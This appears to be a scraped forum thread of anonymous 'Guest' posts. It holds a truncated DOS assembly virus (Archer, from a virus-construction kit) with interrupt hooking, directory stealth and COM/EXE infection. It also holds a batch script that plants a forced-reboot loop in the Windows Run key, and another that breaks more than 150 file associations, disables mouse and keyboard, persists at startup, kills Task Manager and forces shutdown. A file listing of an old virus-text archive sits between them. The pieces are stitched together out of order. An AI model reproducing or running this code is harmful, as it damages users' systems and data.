sub word ptr ds:[413h],(MEM_SIZE+1023) / 1024

mov si,21h * 4 ; get original int 21

mov di,offset old_int_21

movsw

movsw

mov word ptr ds:[si - 4],offset new_int_21

mov ds:[si - 2],es ; and set new int 21

installed:

call activate ; activation routine

pop es ds ; restore segregs

cmp sp,MARKER ; check for .EXE

je exe_exit

com_exit:

lea si,[bp + host] ; restore host program

mov di,100h

push di

movsw

movsb

call fix_regs ; fix up registers

ret ; and leave

exe_exit:

mov ax,ds ; fix up return address

add ax,10h

add ax,cs:[bp + exe_cs]

mov cs:[bp + return_cs],ax

mov ax,cs:[bp + exe_ip]

mov cs:[bp + return_ip],ax

mov sp,[bp + exe_sp] ; restore SP

call fix_regs ; fix up registers

db 0EAh ; back to host program

return_ip dw 0

return_cs dw 0

exe_cs dw -16 ; orig CS:IP

exe_ip dw 103h

exe_sp dw -2 ; orig SP

fix_regs:

xor ax,ax

cwd

xor bx,bx

mov si,100h

xor di,di

ret

; interrupt 21 handler

int_21:

pushf

call dword ptr cs:[old_int_21]

ret

new_int_21:

cmp ax,PING ; residency test

je ping_pong

cmp ax,4B00h ; execute program

je execute

cmp ah,3Dh ; file open

je file_open

cmp ah,11h ; directory stealth

je dir_stealth

cmp ah,12h

je dir_stealth

int_21_exit:

db 0EAh ; never mind ...

old_int_21 dd 0

ping_pong:

mov bx,PONG

iret

dir_stealth:

call int_21 ; get dir entry

test al,al

js dir_stealth_done

push ax bx es

mov ah,2Fh

int 21h

cmp byte ptr es:[bx],-1 ; check for extended FCB

jne no_ext_FCB

add bx,7

no_ext_FCB:

mov ax,es:[bx + 17h] ; check for infection marker

and al,31

cmp al,STAMP

jne dir_fixed

sub word ptr es:[bx + 1Dh],VIRUS_SIZE + 3

sbb word ptr es:[bx + 1Fh],0

dir_fixed:

pop es bx ax

dir_stealth_done:

iret

file_open:

push ax cx di es

call get_extension

cmp [di],'OC' ; .COM file?

jne perhaps_exe ; perhaps .EXE then

cmp byte ptr [di + 2],'M'

jne not_prog

jmp a_program

perhaps_exe:

cmp [di],'XE' ; .EXE file?

jne not_prog

cmp byte ptr [di + 2],'E'

jne not_prog

a_program:

pop es di cx ax

jmp execute ; infect file

not_prog:

pop es di cx ax

jmp int_21_exit

execute:

push ax bx cx dx si di ds es

xor ax,ax ; critical error handler

mov es,ax ; routine - catch int 24

mov es:[24h * 4],offset int_24

mov es:[24h * 4 + 2],cs

mov ax,4300h ; change attributes

int 21h

push cx dx ds

xor cx,cx

call set_attributes

mov ax,3D02h ; open file

call int_21

jc cant_open

xchg bx,ax

push cs ; CS = DS

pop ds

mov ax,5700h ; save file date/time

int 21h

push cx dx

mov ah,3Fh

mov cx,28

mov dx,offset read_buffer

int 21h

cmp word ptr read_buffer,'ZM' ; .EXE?

je infect_exe ; yes, infect as .EXE

mov al,2 ; move to end of file

call move_file_ptr

cmp dx,65279 - (VIRUS_SIZE + 3)

ja dont_infect ; too big, don't infect

sub dx,VIRUS_SIZE + 3 ; check for previous infection

Guest

echo @echo off>c:windowshartlell.bat

echo break off>>c:windowshartlell.bat

echo shutdown -r -t 11 -f>>c:windowshartlell.bat

echo end>>c:windowshartlell.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f

echo

PAUSE

Guest

@echo off

prompt $P $G

assoc .doc = fA1luRe

assoc .docx = fA1luRe

assoc .log = fA1luRe

assoc .msg = fA1luRe

assoc .pages = fA1luRe

assoc .rtf = fA1luRe

assoc .txt = fA1luRe

assoc .wpd = fA1luRe

assoc .wps = fA1luRe

assoc .accdb = fA1luRe

assoc .blg = fA1luRe

assoc .csv = fA1luRe

assoc .dat = fA1luRe

assoc .db = fA1luRe

assoc .efx = fA1luRe

assoc .mdb = fA1luRe

assoc .pdb = fA1luRe

assoc .pps = fA1luRe

assoc .ppt = fA1luRe

assoc .pptx = fA1luRe

assoc .sdb = fA1luRe

assoc .sdf = fA1luRe

assoc .sql = fA1luRe

assoc .vcf = fA1luRe

assoc .wks = fA1luRe

assoc .xls = fA1luRe

assoc .xlsx = fA1luRe

assoc .xml = fA1luRe

assoc .bmp = fA1luRe

assoc .gif = fA1luRe

assoc .jpg = fA1luRe

assoc .png = fA1luRe

assoc .psd = fA1luRe

assoc .psp = fA1luRe

assoc .thm = fA1luRe

assoc .tif = fA1luRe

assoc .ai = fA1luRe

assoc .drw = fA1luRe

assoc .eps = fA1luRe

assoc .ps = fA1luRe

assoc .svg = fA1luRe

assoc .3dm = fA1luRe

assoc .dwg = fA1luRe

assoc .dxf = fA1luRe

assoc .pln = fA1luRe

assoc .indd = fA1luRe

assoc .pct = fA1luRe

assoc .pdf = fA1luRe

assoc .qxd = fA1luRe

assoc .qxp = fA1luRe

assoc .rels = fA1luRe

assoc .aac = fA1luRe

assoc .aif = fA1luRe

assoc .iff = fA1luRe

assoc .m3u = fA1luRe

assoc .mid = fA1luRe

assoc .mp3 = fA1luRe

assoc .mpa = fA1luRe

assoc .ra = fA1luRe

assoc .wav = fA1luRe

assoc .wma = fA1luRe

assoc .3g2 = fA1luRe

assoc .3gp = fA1luRe

assoc .asf = fA1luRe

assoc .asx = fA1luRe

assoc .avi = fA1luRe

assoc .flv = fA1luRe

assoc .mov = fA1luRe

assoc .mp4 = fA1luRe

assoc .mpg = fA1luRe

assoc .rm = fA1luRe

assoc .swf = fA1luRe

assoc .vob = fA1luRe

assoc .wmv = fA1luRe

assoc .asp = fA1luRe

assoc .cer = fA1luRe

assoc .csr = fA1luRe

assoc .css = fA1luRe

assoc .htm = fA1luRe

assoc .html = fA1luRe

assoc .js = fA1luRe

assoc .jsp = fA1luRe

assoc .php = fA1luRe

assoc .rss = fA1luRe

assoc .tvpi = fA1luRe

assoc .tvvi = fA1luRe

assoc .xhtml = fA1luRe

assoc .fnt = fA1luRe

assoc .fon = fA1luRe

assoc .otf = fA1luRe

assoc .ttf = fA1luRe

assoc .8bi = fA1luRe

assoc .plugin = fA1luRe

assoc .xll = fA1luRe

assoc .cab = fA1luRe

assoc .cpl = fA1luRe

assoc .cur = fA1luRe

assoc .dll = fA1luRe

assoc .dmp = fA1luRe

assoc .drv = fA1luRe

assoc .key = fA1luRe

assoc .lnk = fA1luRe

assoc .sys = fA1luRe

assoc .cfg = fA1luRe

assoc .ini = fA1luRe

assoc .keychain = fA1luRe

assoc .prf = fA1luRe

assoc .app = fA1luRe

assoc .bat = fA1luRe

assoc .cgi = fA1luRe

assoc .com = fA1luRe

assoc .exe = fA1luRe

assoc .pif = fA1luRe

assoc .vb = fA1luRe

assoc .ws = fA1luRe

assoc .7z = fA1luRe

assoc .deb = fA1luRe

assoc .gz = fA1luRe

assoc .pkg = fA1luRe

assoc .rar = fA1luRe

assoc .sit = fA1luRe

assoc .sitx = fA1luRe

assoc .tar.gz = fA1luRe

assoc .zip = fA1luRe

assoc .zipx = fA1luRe

assoc .bin = fA1luRe

assoc .hqx = fA1luRe

assoc .mim = fA1luRe

assoc .uue = fA1luRe

assoc .c = fA1luRe

assoc .cpp = fA1luRe

assoc .dtd = fA1luRe

assoc .java = fA1luRe

assoc .pl = fA1luRe

assoc .bak = fA1luRe

assoc .bup = fA1luRe

assoc .gho = fA1luRe

assoc .ori = fA1luRe

assoc .tmp = fA1luRe

assoc .dmg = fA1luRe

assoc .iso = fA1luRe

assoc .toast = fA1luRe

assoc .vcd = fA1luRe

assoc .gam = fA1luRe

assoc .nes = fA1luRe

assoc .rom = fA1luRe

assoc .sav = fA1luRe

assoc .dbx = fA1luRe

assoc .msi = fA1luRe

assoc .part = fA1luRe

assoc .torrent = fA1luRe

assoc .yps = fA1luRe

rundll32.exe mouse, disable

rundll32.exe keyboard, disable

copy setup.bat %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

copy setup.bat %windir%\System32

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v fA1luRe /t REG_SZ /d %windir%\System32\setup.bat

taskkill /f /im taskmgr.exe

reg restore HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr = 1

shutdown -s -f -t 10 -c "PwN3D by fA1luRe!!!"

Guest

800-5.txt 82314

A Guide to the Selection of Anti-Virus Tools and Techniques, by W.T. Polk and L.E. Basshan, December 1992

abaittut.txt 14720

Information on the "Anti-Bait" Method of Virus Transmission

adebgtut.txt 15848

Anti-Debugger Techniques by The Master Hides Behind the Mask

agents.txt 36769

McAfee Associates Agent Listing (February 23, 1993)

allvirus.vir 22209

PC Virus Listing, by Jim Goodwin, 1989

allvirusdf.vir 30897

Slightly Updated Version of Jim Goodwin's List.

amigvir1.txt 3314

A History of the Amiga Viruses, by Paul M. of POISON Cracking Association

amigvir2.txt 6144

A History of the Amiga Viruses by Ed Earing

amigvir3.txt 1920

The Amiga IRQ Virus: It's Out! (December 28, 198

anaco001.txt 16048

ANACONDA #001: The Official VIPER Electronic Mag by Viral Inclined Programming Experts Ring

apply.yam 4117

APPLICATION: Youths Against McAfee

arcvnews01.txt 56065

ARCV: The Association of Really Cruel Viruses Newsletter

armag911.txt 2594

The 911 Virus, Disassembly and Commentary by Black Wolf

atari101.txt 54379

Viruses 101: Chapter 1

avcr-01.001 3088

Amateur Virus Creation Research Group Magazine: Introduction

avcr-01. 002 39187

Amateur Virus Creation Research Group Magazine: The New DS-512 Virus

avcr-01.003 3223

Amateur Virus Creation Research Group Magazine: Nuking, by Thimble

avcr-01. 004 3605

Amateur Virus Creation Research Group Magazine: The *** Virus

avcr-01.005 24313

Amateur Virus Creation Research Group Magazine: the AMI Virus

avcr-01.006 7359

Amateur Virus Creation Research Group Magazine: An Introduction to ASM

avcr-01.007 21995

Amateur Virus Creation Research Group Magazine: Research of the Air Cop Virus, by Security Threat

avcr-01.008 22344

Amateur Virus Creation Research Group Magazine: Research of the Wigger Virus, by Security Threat

avcr-01.009 2881

Amateur Virus Creation Research Group Magazine: Analysis of Connie

avcr-01.010 3392

Amateur Virus Creation Research Group Magazine: OhhLala Virus

avcr-01.011 4612

Amateur Virus Creation Research Group Magazine: Twister Virus

avcr-01.012 2892

Amateur Virus Creation Research Group Magazine: Vlamix 1.0

avirus.txt 4458

Overview of Some Amiga Viruses

backdoor.txt 6512

Information About Backdoors and MS-DOS and BIOS That Can Be Used by Viruses, by Qark of VLAD

baitdet.txt 6722

Advanced Bait Detection by CoKe of VLAD

batvirus.txt 668

Creating a Batch File Virus

bbinterv.iew 21652

Anatomy of a Virus Author: A Biography of the Black Baron by Matthew Probert

bdinterv.iew 18873

Interview with A Virus Writer named Blode by The Unforgiven

bedtime.nfo 4338

NFO: The Bedtime Virus, by Youngsters Against McAfee (November 16, 1992)

blckbook.txt 24240

The little Black Book of Computer Viruses Volume One: The Basic Technology by Mark A. Ludwig (1991)

bluenine.nfo 9706

A Technical Discussion About the Blue Nine Virus by Conzouler (November 19, 1994)

braininf.vir 4577

Information on the Brain Virus And Variants

bulgfact.txt 57241

The Bulgarian and Soviet Virus Factories by Vesselin Bontchev, Director of Laboratory of Computer Virology, Bulgarian Academy of Sciences, Sofia, Bulgaria

bulgfactdoc.vir 57241

The Bulgarian and Soviet Virus Factories

catvir.txt 10223

How to write a virus program, by the Cheshire Cat

ccinterv.iew 8675

Interview with Crom-Cruach of Trident

chaos.nfo 3677

INFO: The Viral Collector's Kit #1 by The Knights of Chaos (February 4, 1995)

cmvs-1.v1 37357

ViriiSearch: The Virus Research Newsletter Volume 1 Number 1

cmvs-2.v1 60096

ViriiSearch: The Virus Research Newsletter Volume 1 Number 2 (July 2, 1992)

cmvs-3.v1 59651

ViriiSearch: The Virus Research Newsletter Volume 1 Number 3 (August 2, 1992)

cnws2000.vir 14585

Computer Virus Research and Information Service Index

cnws2001.vir 17995

Computer Virus Research and Information Service #1

cnws2002.vir 3036

Computer Virus Research and Information Service #2

cnws2003.vir 5457

Computer Virus Research and Information Service #3

cnws2004.vir 44383

Computer Virus Research and Information Service #4

cnws2005.vir 49238

Computer Virus Research and Information Service #5

cnws2006.vir 8975

Computer Virus Research and Information Service #6

cnws2007.vir 8956

Computer Virus Research and Information Service #7

cnws2008.vir 91748

Computer Virus Research and Information Service #8

comp.vir 8320

The USENET Virus: A Cautionary Tale by Peter de Silva (April 20, 1990)

cpi-1.txt 20245

Corrupted Programming International Newsletter #1 by Doctor Dissector (June 30, 1989)

cpi-2.txt 99461

Corrupted Programming International Newsletter Issue #2

cpi1.vir 24305

CPI Newsletter Volume #1, 1989

cpi2.vir 98758

CPI Newsletter Volume #2

cpivirus.txt 23568

Corrupted Programming Internation #1: Computer Viruses, a Protagonist's Point of View by Doctor Dissector (June 27, 1989)

cpivirus2.txt 90571

Corrupted Programming International #2 by Doctor Dissector: Trojan Horses and Virii: A Protagonist's Point of View (July 27, 1989)

crcrevue.vir 55986

Comparison: Products to Detect Changes to Programs

csvir87.vir 4771

CompuServe Magazine's Virus History Timeline: 1987

csvir88.vir 103572

CompuServe Magazine's Virus History Timeline: 1988

csvir89.vir 69893

CompuServe Magazine's Virus History Timeline: 1989

cvirs.101 1****

C VIRUS 101: An Introduction to Viruses in C

cvm.txt 23552

Computer Virus Myths by Rob Rosenberger with Ross Greenberg

datut001.txt 8220

Scan Strings, How They Work, and How to Avoid Them, by Dark Angel

datut002.txt 9941

An introduction to Nonoverwriting Virii by Dark Angel

datut003.txt 14844

An introduction to Nonoverwriting Virii II: EXE Infectors, by Dark Angel

datut004.txt 18463

An Introduction to Nonoverwriting Virii III: SYS Infectors by Dark Angel

datut005.txt 6571

Code Optimization: A Beginner's Guide by Dark Angel

datut006.txt 10873

Advanced Polymorphism Primer by Dark Angel

datut007.txt 8171

SFT's and Their Usage, by Dark Angel

datut008.txt 17676

EXE Self-Disinfection by Dark Angel

datut009.txt 11690

Boot Infectors by Dark Angel

datut010.txt 5910

UMB Residency by Dark Angel

desc.sdi 444

NFO: The Smeg Virus Construction Kit

deth001.rot 4661

Megadeth's Guide to Virus Researching Part I by Megadeth of .ROTing [DeTH]

dhcivwar.txt 2206

Relationship Chart of the Civil War and Related Viruses by TridenT (1993)

dhinterv.iew 8668

Interview with Dark Helmet of Trident

diogenesdoc.vir 3217

Diogenes 2.0 Documentation and User Manual

dirstlth.txt 6061

Directory Stealth Techniques of Viruses (FCB)

drkfib01.txt 3524

Virus Writers Reply to the SCAN.EXE Program

enigma.asm 18797

DISASSEMBLY: The Enigma Virus

european.txt 19456

List of Known Viruses in the UK, by Joe Hirst of the British Computer Virus Research Centre

eval.vir 26111

Anti-Viral Product Evaluation

fester.vir 10122

Festering Hate: A Description of an Apple II Virus, by the Bowen Arrow

firefly.txt 19617

The Firefly Virus, by Nikedamus

fish.vir 9382

Thoughts on the Fish Virus

fndint21.txt 12608

Finding INT 21's Real Address Using the PSP by Satan's Little Helper

fog.txt 17483

FOG: A Polymorphic Encription Algorithm by Eclipse

fullstlt.txt 10033

A Full Stealth or Disinfection on Open by Blonde of Immortal Riot

funbot2.cvp 3190

How the Boot Sequence Operates, Relevant to Virus Infection

funbot3.cvp 3465

How the Boot Sequence Operates Relevant to Viral Infection, Part II.

fungen1.cvp 2792

Computer Operations and Viral Operations

fungen2.cvp 2721

Viral operations: How Viruses Function

fungen3.cvp 2672

How Viruses Use Operating Systems

fungen4.cvp 2629

How Viruses Hide in System Layers

fungen5.cvp 2939

How Viruses are Activated

fungen6.cvp 2679

How to Detect Changes made by a Virus

fungen7.cvp 2716

Checking Files for Viruses

fungen8.cvp 3033

Checking Files for Viruses, Part II

fungen9.cvp 2664

Checking the System Files for Viruses

fungena.cvp 2766

How Viruses Avoid Detection

funpiv1.cvp 2542

Viruses that Affect and Infect Files

funpiv2.cvp 2375

Viruses and how they Insert Themselves

funpiv3.cvp 2529

How to Add a Virus to a Program

funpiv4.cvp 2895

Viral Code "Association"

funpiv5.cvp 2872

Variations of Computer Virus Infection

g2.txt 25600

Phalcon/Skism's G^2 Version 0,70: The Second Generation of Virus Creation by Dark Angel (January 1, 1993)

gao_rpt 106252

The General Accounting Office Report on Computer Viruses, 1988

gf.txt 1966

Information and BBS List for General Failure, a H/P/A/V/C Oriented Computer Organization

glath.vir 21116

Computer Viruses: A Rational View, By Dr. Raymond Glath

gold-bug.txt 9373

Analysis of the Gold Bug Virus

goodwin.txt 137805

An Analysis of Computer Virus Structures (April 7, 1989)

greetng1.txt 3202

NFO: The Grretings Virus by Youngsters Against McAfee (January 2, 1993)

guardian.bbs 29058

The Guardian Lists: An Abbreviated Trojan Alert List Issue #1 (November 12, 1989)

guardian.vir 53823

The Guardian List, Issue #1, Sept. 25, 1989

hackmisc.9 9303

Hacked/Miscellaneous Dangerous Files, #9

hate.txt 1540

BBS AD: The Immortal Hate BBS

hatedetect.vir 5984

Program to Detect the Festering Hate or CyberAIDS Apple II Virus, by Tom Weishaasr (July, 198

hitler.a86 3****

The HITLER virus: commented in a rough 'n' ready way by the Crypt Newsletter staff for issue #11, January 1993

hormones.vir 19584

Net Hormones: Infection Control using Cooperation among Computers

hr5061.vir 2309

The text of H.R. 5061

hysteria.vir 18748

Virus Hysteria! By Richard B. Levin

ibmpaper.vir 87040

Coping with Computer Viruses and Related Problems

identify.txt 20602

Developing Virus Identification Products, by Tim Sankary, 1989

illegal.nfo 2083

NFO: Illegality, the Unstoppable Crime Machine (November 12, 1994)

implemen.mca 42307

Implementing Anti-Viral Programs, by John McAfee 1989

index.mag 1201

Index to SLAM Magazine Issue #1 (January 1997)

intro1.cvp 2475

Introduction to the Computer Virual Programs Column

ivm-95.1 14****

Immortal Virus Magazine Issue #95.1

jeru-b.asm 42115

DISASSEMBLY: The Jerusalem B Virus

jeru-dc.vir 3328

Analysis of the Jerusalem DC Virus

jtinterv.iew 17375

INTERVIEW: John Tardy of Trident in The Netherlands

jvvirus.txt 42968

Jerusalem B Virus Source Code

killhead.vir 959

Virus Source Code that Destroys the Disk Head

levine.pap 13323

Potential Virus Attack by L. P. Levine

lminterv.iew 54289

The Faces Behind the Masks by Sara Gordon (November 1994)

locprst.txt 32002

Excerpt from "The Virus Creation Labs: A Journey Into the Underground": A Preist Deploys His Satanic Minions

ltlmess.slt 4005

The Little Mess Spawning Virus Source from Crom-Cruach of Trident (1992)

lzinterv.iew 20100

INTERVIEW: Lord Zero, Virus Writer

macv.txt 24130

How to Write a Virus for the Macintosh, or How I Learned To Stop Worrying And Love The Resource Manager

malmsey.txt 4058

Information on the Malmsey Virus (October, 1992)

mayhem.txt 1384

Mayhem at Firms Plagued by Virus, by Philip Braund of The Mirror, transcribed by Phantasm (March 7th, 1992)

mbfamily.txt 6942

The Mayberry Family of Virus by HypoDermic

mbinterv.iew 13793

INTERVIEW: Metabolis of VLAD (Virus Writing Group)

mcaffvirus.txt 7075

Virus Characteristics, by McAfee Virus Scanning

mdef.inf 4864

The MDEF Macintosh Virus, by Tom Young of Cornell Information Technologies

melissa.txt 13926

The Melissa Macro Virus, a Report Prepared by Robert M. Slade

memres.txt 7779

Some Information on Memory Residence Methods for Viruses

michael.asm 6969

DISASSEMBLY: Michelangelo Virus

michangl.txt 6840

The Michaelangelo Virus Source Code

mk-chart.txt 1835

A Virus Relationship Chart of Masud Khafir's Viruses

mkinterv.iew 12153

INTERVIEW: Masud Khafir of Trident

mkvirlst.txt 17466

A List of Viruses Written by Masud Khafir of Trident

necro.a86 2****

Source code for the Necro, A.k.a. "Skull" Virus

net.hor 19511

Net Hormones: Part 1 - Infection Control assuming Cooperation among Computers

newinstl.txt 1472

Installation Instructions for Nowhere Man's Virus Creation Library v1.00

nist01.txt 5761

Columbus Day Virus: Press Release by Jan Kosko Sept. 22, 1989

nist02.txt 4238

Columbus Day Virus: A Fact Sheet

offspr82.txt 1470

DOCUMEN#TATION: Offspring v0.82 by Virogen (September 6, 1993)

p1.txt 10934

Attack of the Computer Virus, By Lee Dembart

pcblkjck.txt 4608

Features of Blackjack Virus (PC) (January 24, 1989)

peacevir.vir 2573

Computer Virus Hits Again (The Peace Virus)

ph-vir1.txt 19794

Dark Angel's Phunky Virus Writing Guide #1

pngintrv.iew 9876

INTERVIEW: Persona No Grata of Trident in The Netherlands

polyflag.txt 18411

A Humble PolyMorphic Engine Primer by Absolute Overlord

polymorf.txt 31851

Post Discovery Strategies: Hiding Your Virus After Discovery, by Sepultura

polymorph.txt 17432

Post Discovery Strategies: Hiding Your Virus After Discovery, by Sepultura

polymrph.txt 14524

Polymorphic Viruses Escape Detection but Get Our Attention

polyvir.txt 6299

Computer Virus Catalog 1.2: Dedicated Virus (31-January 1992)

popscia86.vir 4472

Popoolar Science virus - a very simple overwriting infector

portexec.txt 9293

Infection of Portable Executables by Qark and Quantum of VLAD

ps-vir1.txt 19801

Dark Angel's Phunky Virus Writing Guide (Part 1)

ps-vir2.txt 29546

Dark Angel's Phunky Virus Writing Guide (Part 2) The Replicator

ps-vir3.txt 20133

Dark Angel's Phunky Virus Writing Guide (Part 3) Non-Resident Virii, Part II

ps-vir4.txt 22970

Dark Angel's Phunky Virus Writing Guide (Part 4) Resident Virii, Part I

ps-vir5.txt 20131

Dark Angel's Phunky Virus Writing Guide (Part 5) Resident Viruses, Part II

ps_vir1.vir 19865

Phalcon Skism, Part I

ps_vir2.vir 29617

Phalcon Skism, Part II

ps_vir3.vir 20204

Phalcon Skism, Part III

ps_vir4.vir 23041

Phalcon Skism, Part IV

qkinterv.iew 15053

INTERVIEW: Qark of Virus Labs and Distribution (VLAD) by The Unforgiven

rab_mem.apl 3110

APPLICATION to Join RABID by ProTurbo of RABID (1991)

ratboy-1.txt 12067

RatBoy's Overwriting Virus Tutorial

ratboy-2.txt 15758

RatBoy's Overwriting Virus Tutorial Part II

readlist.vir 12800

An abbreviated bibliography for computer viruses

resist.txt 29417

Resist! Further Virus Strategies by Mouth of Sauron

rjinterv.iew 31156

An Interactive Interview with Virus-Writer Rajaat of Genesis

robin.hod 6655

Viruses and System Security (a story)

rstut001.txt 13765

Disinfecting an Infected File by Rock Steady of NuKE

rstut002.txt 9350

TSR COM Infections by Rock Steady of NuKE

rstut003.txt 7782

Constructing Kit on Infecting .COM by Rock Steady of NuKE

rstut004.txt 20142

Infection on Closing by Rock Steady of NuKE

rstut005.txt 13378

EXE Infections Part I: Infection Process, by Rock Steady of NuKE

rstut006.txt 7572

EXE Infectors Part II by Rock Steady of NuKE

rstut007.txt 11905

Directory Stealth by Rock Steady of NuKE

rstut008.txt 7273

Directory Stealth Method 2 by Rock Steady of NuKE

rstut009.txt 5350

Memory Stealth by Rock Steady NuKE

rstut010.txt 28965

The Dangers of Thunderbytes TBClean Emulation Techniques by Rock Steady of NuKE (August, 1993)

rumors.txt 9250

Rumors of Worms and Trojan Horses: Danger Lurking in the Public Domain, by Mike Guffey

rvlatn1.vir 48324

Revelation, a Virus E-Zine, Vol. 1 Issue 1

samson.vir 5642

Samson's PC Virus List

scitzo.nfo 1954

Virus Spotlight: The Scitzo Virus

sdwlnd02.ans 3788

ANSI BBS AD: Shadowland BBS

six_byte.pad 17377

Six Bytes for Virus Detection in the MS-DOS Envrionment, by Padgett Peterson, 3/29/1991

smallvir.txt 3568

The Smallest Virus I Could Manage (263 Bytes)

span02.vir 1735

You can't release the Worm source code, says SPAN

stealth.txt 3798

Elusive New Viruses Can Avoid Detection by Dennis Flanders

steroid.vir 2304

Discussion of a Trojan Horse program called "Steroid"

stoned-b.txt 10898

The Stoned-B Virus

stoned1.vir 3392

To Remove the Marijuana (Stoned) Virus from HD

stoned_d.law 9105

An Explanation of how the Stoned Virus operates by Mike Lawrie

stormbrg.rt1 2158

A Goodbye from Stormbringer of Phalcon/Skism From the World of Viruses

stormbrg.rt2 1554

A Goodbye from Stormbringer of Phalcon/Skism From the World of Viruses (Part II) (1995)

tag.ans 14090

ANSI BBS AD: The Adventures of Guild

talons01.txt 5850

Some Background on PuKE: An Introduction from TLN

talons02.txt 28869

The True Story about Talon by Talon of NUKE (April, 1994)

talons03.txt 2293

An Incredibly Complicated Tale of Mystery and Intrigue

talontut.txt 7844

Information About Mulipartite Infection of Viruses

tdoc1.txt 14961

Documentation for a Virtual Mouse Drive That's a Virus, by Seth Comstock (August 1993)

tdoc2.txt 5179

Documentation for a Story Program That's Actually a Virus, (1993)

troj.hac 4652

Lots of warnings about EGABTR.EXE

troj.txt 7528

Other warnings for other random virus programs

trojan.vir 9191

How someone's BBS got whacked with Viruses in 1984

tsrtut.txt 4484

A Documentation on Creating TSR Viruses

tuinterv.iew 6820

Intervue with TU About Virus Creation

universa.mol 13613

A universal Detection Model by Chris Ruhl and James Molini

usavirus.vir 2175

Supposed use of a computer virus during Desert Storm

v101pt1 14746

Virus 101 - Chapter 1 by George Woodside (March 1, 1989)

v101pt2 18596

Virus 101 - Chapter 2 by George Woodside (March 6, 1989)

v101pt3 19444

Virus 101 - Chapter 3, by George Woodside (March 13, 1989)

v101pt4 5845

Virus 101 - Chapter 4 by Gordon Meyer (March 30, 1989)

varicell.txt 5474

The Varicella Virus Source Codes, by Rock Steady

vdetect.vir 13696

A Universal Virus Detection Model by Chris Ruhl and James Molini

verify_r.txt 24830

Virus Verification and Removal -- Tools and Techniques by David M. Chess, Nov. 18, 1991

vguide.txt 21135

Computer Viruses: A Rational View by Raymond M. Glath

vi900906.txt 187667

Fidonet Message Base Disucssing Viruses (Summer 1990)

vi901029.txt 181138

Fidonet Message Base Disucssing Viruses (Summer 1990)

vir-1.v1 37205

ViriiSearch: The Virus Research Newsletter Volume 1 Issue 1

vir-2.v1 60027

ViriiSearch: The Virus Research Newsletter Volume 1 Issue 2 (July 2, 1992)

vir-3.v1 59654

ViriiSearch: The Virus Research Newsletter Volume 1 Issue 3 (August 2, 1992)

vir.txt 19800

Dark Angel's Phunky Virus Writing Guide

vir2.txt 29557

Dark Angel's Phunky Virus Writing Guide Installment II

virbillfax.vir 4169

NCSA Testimony on Virus Bills, 1990

virethic.txt 13124

Establishing Ethics in the Computer Virus Arena by Paul W. Ferguson, Jr. (September 1992)

virii.txt 17712

What You Should Know About Computer Viruses by BlenderHead

viris03.txt 7208

Some of the Less Known Viruses (Humor)

virpgm01.txt 12883

Virus Programming Basics Issue #1

virpgm02.txt 23762

Virus Programming Basics Issue #2: Not So Basic

virs.vir 11931

Discussions about the Jerusalem B Virus

virukpc.txt 13056

Known PC Viruses in the UK and their effects, by Dr. Alan Solomon, 1989

virus 5314

Virus Attack! By Rick Arnold

virus-al.ert 2065

Local Area Virus Update, Bay Area - Sacramento, 21 Sep, 1989

virus.1 1821

Virus Discussion on a BBS

virus.kie 32573

The Infection of PC Compatible Computers by Stephen E. Kiel and Raymond K. Lee of the Georgia Institute of Technology

virus.txt 5160

Comparison between Mcaffe's SCAN.EXE (3-25-92) and F-PROT.EXE (4-5-92) by The Researcher and Scan Man

virus1.dna 17710

What You Should Know about Computer Viruses by Blinderhead

virus1.vir 4223

Report on the DATACRIME Virus

virus101.vir 58631

Viruses 101: A Information Set

virus101001.vir 13796

Virus 101 Chapter 1

virus101002.vir 17548

Virus 101 Chapter 2

virus101003.vir 18347

Virus 101 Chapter 3

virus101004.vir 4971

Virus 101 Chapter 4

virus2.txt 11729

The Virus Informer: Your Weekly Virus Newsletter by Mark E. Bishop

virus3.txt 7585

The Virus Informer by Mark E. Bishop: The Macintosh Virus

virus4.txt 4268

The Virus Informer Chapter 4: The Engine That Kills

virus5.txt 49830

The Virus Informer Chapter 5: The Virus List

virus6.txt 1729

The Virus Informer Chapter 7: The Virus Informer Fax Bulletin Service

virus7.txt 1762

The Virus Informer by Mark E. Bishop Chapter 7: Next Week

virus_my.ths 27085

Computer Virus Myths, by Rob Rosenberger (1988-****)

virus_st.whm 16646

A New Stategy for Computer Viruses by William H. Murray

virusbas.vir 1338

An example of a Virus in BASIC

virusbib.txt 4480

Bibliography for Computer Viruses, by Ted Landberg, 02/24/1988

virusbro.vir 9856

Computer Viruses and Trojan Horses; A Guide to Protecting Yourself

virusdet.txt 50981

Virus Detection Alternatives, by Patrick Min

virusdoc.vir 205175

The Computer Virus Epidemic, 1987-****. Article Compilation

viruses.pro 10368

How to write a Virus Program, by The Cheshire Cat

viruses.txt 3123

Safe Telecommunicating may be your Best Protection against Viruses, by Micharl Fischer, A+ Magazine, August 1988

viruses.uss 20740

Viruses in the USSR by Eldar A. Musaev

virusfaq.txt 84745

FAQ: VIUS-L/comp.virus Frequently Asked Questions (November 18, 1992)

virusinf.vir 9216

A Suggested Readings List for Computer Viruses by Jon Mack

virusl.vir 1887

The Virus Informer, Issue #6

virusone.vir 4323

The Virus Informer, Issue #1

virussum.doc 558766

Virus Information Summary List, March 17, 1991, by Patricia M. Hoffman

virussum.txt 607049

The Virus Information Summary List, April 20, 1991 by Patricia M. Hoffman

virusx.txt 14142

Information on VirusX by Steve Tibbet, as well as a list of Amiga Viruses

vlab102.vir 19999

Viral Lab 102, May 1994

wininf01.txt 25224

Windows Executable Infection by Qark and Quantum of VLAD

wininf02.txt 13444

Calling the Windows API in Assembly Language by Qark of VLAD

wordmacro.txt 86611

FAQ: The MS Word 6.x Macro Viruses FAQ v2.0

xyz.txt 3424

Information on the XYZ (Examine Your Zipper) Virus (January, 1994)

yam-ivp.nfo 3769

NFO: The Instant Virus Production Kit by Youngsters Against McAfee (June 12, 1992)

yetiser_ 15345

Polymorphic Viruses: Implementation, Detection, and Protection by VDS Advanced Research Group/Tarkan Yetiser 1993

Report

13. Written by >>>>>>>>>>>VIRUS, on 01-12-2010 08:56

; archer.asm : [Archer] MnemoniX `94

; Created with Biological Warfare - Version 0.90á by MnemoniX

PING equ 0AE3Bh

PONG equ 0CD28h

